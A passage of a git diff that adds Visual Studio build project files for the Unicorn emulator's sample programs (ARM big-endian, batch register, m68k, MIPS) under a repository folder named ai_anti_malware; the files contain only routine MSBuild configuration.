<IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__ns)</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_armeb.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj.filters new file mode 100644 index 0000000..bdd745e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_armeb.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj new file mode 100644 index 0000000..a68048b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{7AA02EDF-D797-494B-929C-F628F4E4EA62}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_batch_reg</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_batch_reg.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj.filters new file mode 100644 index 0000000..098f833 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_batch_reg.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj new file mode 100644 index 0000000..26a2481 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_m68k.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{11727C54-463F-472A-88AF-6C3D6071BF0B}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_m68k</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj.filters new file mode 100644 index 0000000..033b3c0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_m68k.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj new file mode 100644 index 0000000..32c1732 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{E34ECD90-3977-4A4B-9641-4D7F1766E9FD}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_mips</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + 